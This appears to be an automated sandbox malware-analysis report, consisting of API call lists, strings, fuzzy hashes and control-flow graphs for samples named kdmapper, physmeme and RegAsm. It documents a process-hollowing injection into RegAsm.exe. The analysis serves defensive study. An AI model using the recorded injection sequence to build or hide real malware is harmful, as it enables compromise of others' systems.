                                                                                                                                                                          • Opcode ID: 62dc4ef398ba86ecb5693e9da0487502d0b099c0a3321e23e761655b3b35e361
                                                                                                                                                                          • Instruction ID: 0ee2843622976cfb87555069a4d120a14ad68d17cf7b16fa776bbf7e4ee717f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 62dc4ef398ba86ecb5693e9da0487502d0b099c0a3321e23e761655b3b35e361
                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0E533A06D425993E136796C2666F0A438F81338B14131EF910871D3CE908A4305EA
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00631206,?), ref: 00630FEA
                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 00630FF6
                                                                                                                                                                            • Part of subcall function 00626C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00626C54
                                                                                                                                                                          Strings
                                                                                                                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00630FFF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                          • API String ID: 1091760877-2248577382
                                                                                                                                                                          • Opcode ID: c9cbce8b0086b176c739db700ca6f2b046689ebac3c8b5c66143ba8cf0f8c3c0
                                                                                                                                                                          • Instruction ID: 6aa1af1df631f5ca5c63a9d5b74970f7d0e01f0fa09305cb8cb466990bfa62c2
                                                                                                                                                                          • Opcode Fuzzy Hash: c9cbce8b0086b176c739db700ca6f2b046689ebac3c8b5c66143ba8cf0f8c3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 72D0C2316087302687103624AC068AE38078B12732F600718F038543E1CE1009915695
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,0062DA55,?), ref: 0062E2A3
                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0062DA55,?), ref: 0062E2B1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindHandleModuleResource
                                                                                                                                                                          • String ID: RTL
                                                                                                                                                                          • API String ID: 3537982541-834975271
                                                                                                                                                                          • Opcode ID: b15ea38a8cf665155f95a92655a598789b58e173eec65d20d67287e3dbf5b426
                                                                                                                                                                          • Instruction ID: 32a340f7f4ce5271036ce68820d78bfbe39d7adc7c4e50b734fb98d938653d01
                                                                                                                                                                          • Opcode Fuzzy Hash: b15ea38a8cf665155f95a92655a598789b58e173eec65d20d67287e3dbf5b426
                                                                                                                                                                          • Instruction Fuzzy Hash: 06C0123164173066E73097757C0DB87AA5A5B00F92F05145CB541E93D1D6A5C54486A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E467
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: pc$zc
                                                                                                                                                                          • API String ID: 1269201914-3652032699
                                                                                                                                                                          • Opcode ID: 7f666ff8967ffbc2e897dbb8aa187462a91ea5076e862254a4e7ddcfa1d284f3
                                                                                                                                                                          • Instruction ID: aa6f50b31b44eb7f33fb81f5a8cc3d236061e873f662890b466e541cb40d4723
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f666ff8967ffbc2e897dbb8aa187462a91ea5076e862254a4e7ddcfa1d284f3
                                                                                                                                                                          • Instruction Fuzzy Hash: CAB012C1659240FC3144A1141C12C37014FC0C4F61F30812EFC05C01C2D8414D0505B3
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E467
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: Uc$zc
                                                                                                                                                                          • API String ID: 1269201914-778484526
                                                                                                                                                                          • Opcode ID: 659fb3f8de90fba827c3b022cb08ac874cb1d10957f511a913cc38d348e729fd
                                                                                                                                                                          • Instruction ID: 0831a952be7be74c00d7f988af85a1463a5f1cf26533e7e23a457523cb26eee0
                                                                                                                                                                          • Opcode Fuzzy Hash: 659fb3f8de90fba827c3b022cb08ac874cb1d10957f511a913cc38d348e729fd
                                                                                                                                                                          • Instruction Fuzzy Hash: A8B012D1658200BC310421101D12C37020FC0C0F25F30C12EFA01D40C2D8420F0604B2

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:45%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:37.5%
                                                                                                                                                                          Total number of Nodes:16
                                                                                                                                                                          Total number of Limit Nodes:0

                                                                                                                                                                          Callgraph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                          • Disassembly available
                                                                                                                                                                          callgraph 0 Function_02891F8B 1 Function_00F404F0 2 Function_00F400F0 3 Function_02892F83 4 Function_02891F82 5 Function_00F401F8 6 Function_02892585 7 Function_00F400E4 8 Function_02892F9F 9 Function_00F401EC 10 Function_00F408E8 11 Function_00F400D4 12 Function_00F404D5 13 Function_00F404D1 14 Function_00F404D9 15 Function_00F401C0 16 Function_028914BF 17 Function_02891DB0 18 Function_00F400C8 19 Function_00F401B4 20 Function_028924C9 21 Function_00F400B0 22 Function_00F400BC 23 Function_02892FDB 24 Function_00F400A0 25 Function_00F40BA1 26 Function_00F401A8 27 Function_00F404A8 28 Function_028928D7 29 Function_00F40090 30 Function_00F40198 31 Function_028928E7 32 Function_00F40485 33 Function_00F40080 34 Function_00F40481 35 Function_00F4048D 36 Function_00F40988 89 Function_00F40C2F 36->89 94 Function_00F40510 36->94 95 Function_00F4051C 36->95 98 Function_00F40B18 36->98 101 Function_00F40504 36->101 37 Function_00F40188 38 Function_00F40489 39 Function_028928F7 40 Function_02891F09 41 Function_00F40475 42 Function_00F40070 43 Function_00F40471 44 Function_02891D0F 45 Function_00F4027C 46 Function_00F4047D 47 Function_00F40178 48 Function_00F40978 48->89 48->94 48->95 48->98 48->101 49 Function_00F40479 50 Function_02892907 51 Function_00F40165 52 Function_0289251B 53 Function_00F40060 54 Function_00F40260 55 Function_0289191F 56 Function_00F4026C 57 Function_00F4046D 58 Function_00F40469 59 Function_02892C14 60 Function_02892917 61 Function_00F40154 62 Function_00F40054 63 Function_00F40254 64 Function_02892129 65 Function_00F40A57 65->89 65->94 65->95 65->98 66 Function_00F40450 67 Function_00F4045C 68 Function_02892927 69 Function_00F40244 70 Function_00F40444 71 Function_00F40847 72 Function_0289263C 73 Function_00F40148 74 Function_00F40848 75 Function_02891934 76 Function_02892937 77 Function_00F40234 78 Function_00F40535 79 Function_02892448 80 Function_00F40531 81 Function_00F4013C 82 Function_02892947 83 Function_00F40224 84 Function_02892759 85 Function_02892F5E 86 Function_00F4012C 87 Function_00F4052D 88 Function_02892D53 90 Function_00F40529 91 Function_02891254 92 Function_02892957 93 Function_00F40214 96 Function_00F4011C 97 Function_02891D61 99 Function_02892667 100 Function_02892967 102 Function_00F40100 103 Function_0289287E 104 Function_00F4010C 105 Function_00F40208

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0289209B,0289208B), ref: 02892298
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 028922AB
                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 028922C9
                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(0000008C,?,028920DF,00000004,00000000), ref: 028922ED
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02892318
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02892370
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 028923BB
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 028923F9
                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(00000098,04ED0000), ref: 02892435
                                                                                                                                                                          • ResumeThread.KERNELBASE(00000098), ref: 02892444
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.1380972675.0000000002891000.00000040.00000800.00020000.00000000.sdmp, Offset: 02891000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2891000_physmeme.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                          • API String ID: 2687962208-1257834847
                                                                                                                                                                          • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                          • Instruction ID: 037ca3a8e8430e398cf0a9003a21436f045356f5f093942131b969992a5ff8f2
                                                                                                                                                                          • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                          • Instruction Fuzzy Hash: E4B1E47660028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB345D774FA518B94

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 158 f40510-f41081 VirtualProtectEx 161 f41083 158->161 162 f41088-f4109c 158->162 161->162
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,03893590,?,00000001,0000012C), ref: 00F41074
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.1380835285.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_f40000_physmeme.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                          • Opcode ID: b2f90017465caadd2851485728af7b20de073aec08f2d4fb1347aa2eee0e84f1
                                                                                                                                                                          • Instruction ID: fb9a3a6abbdc2b458340177b2ad9ef4b1d6d0c159a8d878caba998483d8495d3
                                                                                                                                                                          • Opcode Fuzzy Hash: b2f90017465caadd2851485728af7b20de073aec08f2d4fb1347aa2eee0e84f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4421FFB5D00259EFCB10DF9AD884ADEFFB4FB48320F10812AE918A7250D375A954CFA5

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:0.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:16.7%
                                                                                                                                                                          Total number of Nodes:42
                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                          execution_graph 20790 40d3c0 20791 40d3c9 20790->20791 20792 40d3d1 GetInputState 20791->20792 20793 40d5ae ExitProcess 20791->20793 20794 40d3de 20792->20794 20795 40d3e6 GetCurrentThreadId GetCurrentProcessId 20794->20795 20796 40d5a9 20794->20796 20798 40d41d 20795->20798 20811 446130 FreeLibrary 20796->20811 20804 40ee70 20798->20804 20806 40ee98 20804->20806 20805 40ef5a LoadLibraryExW 20809 40ef6f 20805->20809 20806->20805 20807 40d59b 20807->20796 20810 412610 CoInitialize 20807->20810 20809->20807 20812 40f7b0 20809->20812 20811->20793 20815 40f7f2 20812->20815 20813 40fae4 20813->20809 20815->20813 20816 443160 20815->20816 20817 4431e0 20816->20817 20819 443176 20816->20819 20817->20813 20818 4431c6 RtlFreeHeap 20818->20817 20819->20818 20820 445294 20821 445304 LoadLibraryExW 20820->20821 20822 4452d9 20820->20822 20823 445316 20821->20823 20822->20821 20824 4471b4 20825 4471d0 20824->20825 20827 44721e 20825->20827 20831 446730 LdrInitializeThunk 20825->20831 20830 446730 LdrInitializeThunk 20827->20830 20829 4472cd 20830->20829 20831->20827 20837 443142 RtlAllocateHeap 20838 447132 20840 446c20 20838->20840 20839 4471a3 20840->20839 20843 446730 LdrInitializeThunk 20840->20843 20842 446ce5 20843->20842 20844 446cf3 20846 446cf8 20844->20846 20845 446dde 20846->20845 20848 446730 LdrInitializeThunk 20846->20848 20848->20845

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 61 40f7b0-40f7f0 62 40f7f2 61->62 63 40f826-40f936 61->63 64 40f800-40f824 call 411bc0 62->64 65 40f966-40f998 63->65 66 40f938 63->66 64->63 69 40f9c9-40f9e2 call 410760 65->69 70 40f99a 65->70 68 40f940-40f964 call 411cc0 66->68 68->65 78 40fae4-40fae6 69->78 79 40f9e8-40fa0d 69->79 74 40f9a0-40f9c7 call 411c40 70->74 74->69 83 40fcc2-40fccc 78->83 81 40fa36-40fa3f 79->81 82 40fa0f 79->82 85 40fa40-40fa4a 81->85 84 40fa10-40fa34 call 411d40 82->84 84->81 87 40fa51-40fa59 85->87 88 40fa4c-40fa4f 85->88 90 40fcb2-40fcb6 call 443160 87->90 91 40fa5f-40fa7c 87->91 88->85 88->87 97 40fcbb-40fcbe 90->97 93 40faa6-40fab1 91->93 94 40fa7e-40fa7f 91->94 95 40fab3-40fab7 93->95 96 40faeb 93->96 98 40fa80-40faa4 call 411dc0 94->98 99 40fac7-40facb 95->99 100 40faed-40faef 96->100 97->83 98->93 102 40fad1-40fad8 99->102 103 40fcaa 99->103 100->103 104 40faf5-40fb36 100->104 106 40fada-40fadc 102->106 107 40fade 102->107 103->90 108 40fb66-40fb71 104->108 109 40fb38 104->109 106->107 112 40fac0-40fac5 107->112 113 40fae0-40fae2 107->113 110 40fb73-40fb7b 108->110 111 40fba4 108->111 114 40fb40-40fb64 call 411e50 109->114 115 40fb87-40fb8b 110->115 116 40fba6-40fba8 111->116 112->99 112->100 113->112 114->108 115->103 118 40fb91-40fb98 115->118 116->103 119 40fbae-40fbd3 116->119 121 40fb9a-40fb9c 118->121 122 40fb9e 118->122 123 40fbd5 119->123 124 40fc06-40fc0d 119->124 121->122 127 40fb80-40fb85 122->127 128 40fba0-40fba2 122->128 129 40fbe0-40fc04 call 411ed0 123->129 125 40fc40-40fc4c 124->125 126 40fc0f-40fc1c 124->126 131 40fcd3-40fcd8 125->131 130 40fc27-40fc2b 126->130 127->115 127->116 128->127 129->124 130->103 133 40fc2d-40fc34 130->133 131->90 135 40fc36-40fc38 133->135 136 40fc3a 133->136 135->136 137 40fc20-40fc25 136->137 138 40fc3c-40fc3e 136->138 137->130 139 40fc51-40fc53 137->139 138->137 139->103 140 40fc55-40fc6b 139->140 140->131 141 40fc6d-40fc6f 140->141 142 40fc73-40fc76 141->142 143 40fc78-40fc98 call 4117c0 142->143 144 40fccd 142->144 147 40fca2-40fca8 143->147 148 40fc9a-40fca0 143->148 144->131 147->131 148->142 148->147
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 2$1.$6(>*$=:li$Ga!1$ZABC$IK$MSO
                                                                                                                                                                          • API String ID: 0-2205979412
                                                                                                                                                                          • Opcode ID: dc0af39f46735f6fc8810d8d65a432b1349a7db07c574dc9d39223abff83bc0b
                                                                                                                                                                          • Instruction ID: 8df93780a8b371d5a2a89ff6c21c9300b0c5160e97c6da9bd56ff8ebb28ea911
                                                                                                                                                                          • Opcode Fuzzy Hash: dc0af39f46735f6fc8810d8d65a432b1349a7db07c574dc9d39223abff83bc0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 37D15A7050C3808BD321DF188490A5FBBE1AF96748F580D3EE4D5AB792D339D949CB9A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 393 446730-446762 LdrInitializeThunk
                                                                                                                                                                          APIs
                                                                                                                                                                          • LdrInitializeThunk.NTDLL(0041380D,?,00000001,?), ref: 0044675E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                          • String ID: clmn$ohij
                                                                                                                                                                          • API String ID: 1029096631-3567580053
                                                                                                                                                                          • Opcode ID: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
                                                                                                                                                                          • Instruction ID: 8f1940826fa5e4ef35febcdafd7184f7e4a9353c3ce711b8b38eacab782ab196
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
                                                                                                                                                                          • Instruction Fuzzy Hash: C841397480D380ABD701AF99D544A1EFBE1AF52709F548C2DE4C4A7392C73AD8588B6B

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 219 40ee70-40ee96 220 40ee98 219->220 221 40eec9-40ef1d 219->221 222 40eea0-40eec7 call 4119b0 220->222 223 40ef5a-40ef72 LoadLibraryExW call 4449b0 221->223 224 40ef1f 221->224 222->221 232 40ef80-40f0b4 call 4493d0 * 12 223->232 233 40f0c0-40f0c5 223->233 234 40f182-40f18f 223->234 235 40f1c5-40f1d1 223->235 236 40f1d8-40f2d5 223->236 237 40ef79-40ef7b 223->237 238 40f0cc-40f0d7 223->238 239 40f0de-40f0fb call 43fc40 223->239 226 40ef20-40ef58 call 411920 224->226 226->223 232->233 232->234 232->235 232->236 232->238 232->239 241 40f420-40f426 232->241 233->235 233->236 233->238 233->241 245 40f1b1-40f1be 234->245 246 40f191-40f195 234->246 235->236 235->241 242 40f2d7 236->242 243 40f31a-40f329 call 40fd20 236->243 247 40f763-40f76d 237->247 238->233 238->234 238->235 238->236 238->238 238->239 238->241 257 40f100-40f107 239->257 241->247 251 40f7a0 241->251 249 40f2e0-40f318 call 411a40 242->249 256 40f32e-40f334 243->256 245->235 245->236 245->238 245->241 253 40f1a0-40f1af 246->253 249->243 253->245 253->253 256->232 256->233 256->234 256->235 256->236 256->237 256->238 256->239 256->241 257->257 260 40f109-40f114 257->260 262 40f116-40f118 260->262 263 40f16a-40f170 call 40f7b0 260->263 264 40f120-40f123 262->264 270 40f175-40f17b 263->270 267 40f160-40f163 264->267 268 40f125-40f144 call 4117c0 264->268 272 40f166 267->272 276 40f146-40f14c 268->276 277 40f14e-40f154 268->277 270->233 270->234 270->235 270->236 270->238 270->241 272->263 276->264 276->277 277->272
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(03EB01F7,00000000), ref: 0040EF62
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                          • String ID: 9?
                                                                                                                                                                          • API String ID: 1029625771-1150883898
                                                                                                                                                                          • Opcode ID: 891c2fb76147fcbfd660747e054fe51af3fae1d98f06ff880934904054e5e699
                                                                                                                                                                          • Instruction ID: 42b0cf5b6e489c6646c3492ae048cf3f7af35fd27ce82f5d7ffdcfcc6bce275d
                                                                                                                                                                          • Opcode Fuzzy Hash: 891c2fb76147fcbfd660747e054fe51af3fae1d98f06ff880934904054e5e699
                                                                                                                                                                          • Instruction Fuzzy Hash: 81B1ACB0408380EBD311DF15FD4166BBBE1EBC6709F45083DE484AB262E7399958DB6B

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 321 445294-4452d7 322 445304-445310 LoadLibraryExW 321->322 323 4452d9 321->323 325 445685-446045 322->325 326 445316-445344 322->326 324 4452e0-445302 call 446520 323->324 324->322 326->325
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0044530C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                          • Opcode ID: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
                                                                                                                                                                          • Instruction ID: 32cf0169799236ea817639a585a2fb97fc7d0b73a9cb276cd4531836bf098fa6
                                                                                                                                                                          • Opcode Fuzzy Hash: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4031C375D04296AFDB00CFA8D8502ADFFB1BB15341F684459D440B7352C734AB15CFA9

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 331 443160-44316f 332 443176-443192 331->332 333 4431f6-4431fa 331->333 334 4431f0 331->334 335 4431e0 331->335 336 443194 332->336 337 4431c6-4431df RtlFreeHeap 332->337 334->333 335->334 338 4431a0-4431c4 call 446610 336->338 337->335 338->337
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlFreeHeap.NTDLL(6A69686F,00000000,?), ref: 004431D3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1398843696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                          • Opcode ID: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
